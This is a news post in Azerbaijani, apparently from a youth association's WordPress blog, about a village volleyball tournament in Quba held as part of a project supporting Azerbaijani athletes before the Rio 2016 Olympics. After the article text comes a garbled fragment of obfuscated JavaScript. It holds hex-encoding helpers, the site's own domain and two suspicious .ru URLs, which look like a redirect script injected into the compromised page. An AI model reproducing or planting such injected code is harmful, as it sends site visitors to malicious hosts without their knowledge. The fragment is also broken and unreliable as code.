Qubalı voleybolçulardan Rio-2016-ya dəstək

IMG_0017Quba rayonunda voleybol növü üzrə turnir təşkil edilib.

Yarış Azərbaycan Respublikası Prezidentinin yanında Qeyri-Hökumət Təşkilatlarına Dövlət Dəstəyi Şurasının maliyyə vəsaiti ilə Qubada fəaliyyət göstərən “Yurd” Gənclərin İntellektual İnkişafına Dəstək İctimai Birliyi tərəfindən icra edilən “Olimpiya mükafatçıları milli sərvətimizdir!-Rio-2016-ya ictimai dəstək” layihəsi çərçivəsində keçirilib.

IMG_0021“Kim sevirsə idmanı, poladdan olar canı” şüarı ilə Quba rayonunun Ağbil kəndində baş tutan tədbirdə yeniyetmə və gənc oğlanlar mübarizə aparıblar.

Rəsmi açılış mərasimində çıxış edən təşkilatın sədri Ramin Mahmudov son illərdə ölkəmizin əldə etdiyi idman IMG_0044nailiyyətlərindən danışıb, cənab Prezident İlham Əliyevin Milli Olimpiya Komitəsinə prezident seçildikdən sonra ölkəmizin dünyanın idman ölkəsinə çevrildiyini qeyd edib. Bunun da nəticəsində yetişməkdə olan gənc nəsil arasında sağlam həyat tərzinin təbliğinin, onların idmana olan marağının artırılmasınıngünün prioritet IMG_0053istiqamətlərindən biri olduğunu bildirib. Layihənin də əsas məqsədinin region gəncləri arasında idmana olan marağın artırılması, ölkəmizin idman nailiyyətlərinin gənc nəsil arasında təbliğ edilməsi və avqust ayında start götürəcək Braziliyanın Rio-de-Janeyro şəhərindəki olimpiya oyunlarında idmançılarımıza ictimai dəstəyin verilməsi olduğunu, xüsusilə IMG_0062də ötən iI Avropa Oyunlarının möhtəşəm təşkilatçılığının əhəmiyyətini vurğulayan natiq bildirib ki, ölkəmizdə bir-birinin ardınca təşkil edilən müxtəlif idman turnirləri Azərbaycanımızın haqq səsinin dünyaya çatdırılması, həqiqətlərinin dünyaya bəyan edilməsi istiqamətində müstəsna əhəmiyyətə malikdir.

IMG_0082Natiq qeyd edib ki, bu kimi tədbirlərin gənclərin sağlam ruhda tərbiyə edilməsi istiqamətində böyük əhəmiyyətini qeyd edib, eyni zamanda Azərbaycanımızın dünyada artan nüfuzunun, idman nailiyyətlərinin gənc nəsil arasında təbliğinin vətənpərvərlik, dövlətçilik və vətənə sədaqət ruhunda tərbiyə edilməsində vacib amil olduğunu bildiriblər.

IMG_0092Rəsmi açılış mərasimindən sonra turnirə start verilib.

Yarışın əsasnaməsinə uyğun olaraq 4 komanda ½ final mərəhələsində mübarizə aparıb. Ağbil kəndinin voleybolçuları Qırmızı qəsəbədən olan həmkarlarına 2-0, Aşağı Atuc kəndinin komandası isə Zərdabi IMG_0111qəsəbəsinin voleybolçularına 2-0 məğlub olaraq III yer uğrunda mübarizə aparmalı olublar. Nəticədə daha güclü olan Ağbil voelybolçuları Aşağı Atucdan olan idmançıları məğlub edərək turnirin bürünc mükafatını qazanıb.

Çox maraqlı keçən finalda isə Zərdabi qəsəbinin gənc idmançıları Qırmızı qəsəbədən olan həmkarları ilə IMG_0117qarşılaşıb. Zərdabi gənclərinin ifasında bir-birindən maraqlı və rəngarəng hücumlar tamaşaçıların marağına səbəb olub. Yekunda daha güclü Zərdabi voleybolçuları 2-0 hesabı ilə rəqiblərindən üstün olaraq turnirin qalibiadını qazanıblar.

Yekunda qalib və mükafatçılara layihə çərçivəsində təşkilatçılar IMG_0122tərəfindən hazırlanmış diplomlar, xüsusi bukletlər, kubok və medallar, “Azərbaycan idmançıları olimpiadalarda” adlı statistik məlumatların əks olunduğu kitabça təqdim olunub.

Qeyd edək ki, layihə çərçivəsində bu günə qədər Quba rayonunun Püstəqasım kəndində stolüstü tennis, IMG_0134Dağlı kəndində qızlar arasında voleybol, Qaraçay kəndində isə oğlanlar arasında 3*3 basketbol növün üzrə turnirlər keçirilib.

Avqust ayınadək davam edəcək layihənin ikinci mərhələsində Quba rayonunun Qımılqışlaq, Talabıqışlaq, Afurca və Rustov kəndlərində intellektal oyunlar üzrə “Olimpiya kuboku” turnirləri də təşkil olunacaq.

IMG_0138

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "yurdgencler.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26482https://gyh1lh20owj.ru/u.html?a=26482

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s